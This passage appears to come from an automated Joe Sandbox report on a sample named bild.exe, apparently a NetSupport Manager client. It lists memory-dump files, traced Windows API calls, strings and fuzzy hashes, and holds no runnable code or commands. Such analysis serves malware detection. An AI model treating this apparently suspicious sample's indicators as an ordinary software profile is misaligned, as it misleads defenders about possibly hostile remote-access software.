                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                                      • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                      • API String ID: 2441568934-1875806619
                                                                                                      • Opcode ID: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                                      • Instruction ID: 32575625ee732fca108261b890e952c9fd6c17214e61566243eaf6e55242290c
                                                                                                      • Opcode Fuzzy Hash: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                                      • Instruction Fuzzy Hash: D1F0A0BCE086651BD730DE99BC00FCAB7D05F1434CF050498EA8627682DBBA7549C2E6
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                                      • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: EnumValue$CloseOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3785232357-0
                                                                                                      • Opcode ID: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                                      • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                                      • Opcode Fuzzy Hash: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                                      • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
                                                                                                      APIs
                                                                                                      • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                                      • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                                      • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                                      • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: SleepThread$CreateMessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 3347742789-0
                                                                                                      • Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                                      • Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
                                                                                                      • Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                                      • Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(0000002C,4764EAAA,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,4764EAAA,?,?,00000000), ref: 110B336F
                                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,4764EAAA,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                                      • SetEvent.KERNEL32(?,?,?,1103D571,?,4764EAAA,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                                      • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,4764EAAA,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Leave$EnterEvent
                                                                                                      • String ID:
                                                                                                      • API String ID: 3394196147-0
                                                                                                      • Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                                      • Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
                                                                                                      • Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                                      • Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94
                                                                                                      APIs
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                      • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                                      • SetFocus.USER32(?), ref: 11007353
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                      • String ID: edit
                                                                                                      • API String ID: 1305092643-2167791130
                                                                                                      • Opcode ID: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                                      • Instruction ID: cb86e9af08271205595a6f41abc8b2cb286fac045a185d6d6013f354b30fec65
                                                                                                      • Opcode Fuzzy Hash: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                                      • Instruction Fuzzy Hash: 8951B1B6A00606AFE741CF64CC80BABB7E5FB88354F15816DF955C7340EB34E9428B61
                                                                                                      APIs
                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                                      • _memmove.LIBCMT ref: 110092B6
                                                                                                        • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                      • String ID: string too long
                                                                                                      • API String ID: 2168136238-2556327735
                                                                                                      • Opcode ID: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                                      • Instruction ID: 8571876bfdcccba51c928a6a288fcd5c1e124ad980ef247a8f71a2e078b75a0c
                                                                                                      • Opcode Fuzzy Hash: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                                      • Instruction Fuzzy Hash: A731C732B14A104BF720DE9CE88095FF7EDEBE57A4B20061FE599C7640E7719C5083A1
                                                                                                      APIs
                                                                                                      • std::exception::exception.LIBCMT ref: 11041413
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                                      Strings
                                                                                                      • VolumeControl exception : %hs, xrefs: 11041431
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                                      • String ID: VolumeControl exception : %hs
                                                                                                      • API String ID: 3728558374-910296547
                                                                                                      • Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                                      • Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
                                                                                                      • Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                                      • Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1
                                                                                                      APIs
                                                                                                        • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                        • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Downloads\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                      • _memmove.LIBCMT ref: 11147211
                                                                                                      Strings
                                                                                                      • Failed to get callstack, xrefs: 111471BD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CurrentFileModuleNameProcess_memmove
                                                                                                      • String ID: Failed to get callstack
                                                                                                      • API String ID: 4135527288-766476014
                                                                                                      • Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                                      • Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
                                                                                                      • Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                                      • Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90
                                                                                                      APIs
                                                                                                      • wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                      • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                      • API String ID: 175691280-2052047905
                                                                                                      • Opcode ID: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                                      • Instruction ID: 95fe0cd820de1796fd70713afb7a02e85a0165c228f84a05359d3cb2f5b90ec5
                                                                                                      • Opcode Fuzzy Hash: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                                      • Instruction Fuzzy Hash: 4FF0A47AA0025CBBCB00DEA5DD40BEEFBBD9B45248F044199E608A7140DE706A45C7A5
                                                                                                      APIs
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread__wcstoi64
                                                                                                      • String ID: *TapiFixPeriod$Bridge
                                                                                                      • API String ID: 1152747075-2058455932
                                                                                                      • Opcode ID: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                                      • Instruction ID: bf80e38bc05b38b2fab7e3f27e0d367de778c9bee9065702c43ca09430eaf323
                                                                                                      • Opcode Fuzzy Hash: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                                      • Instruction Fuzzy Hash: 60F0E57074532D7EFB11DAD6CC45F79B6989300B08FA0003DF528551C8E6B1B9008766
                                                                                                      APIs
                                                                                                      • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                                      • m_hWnd, xrefs: 11001096
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
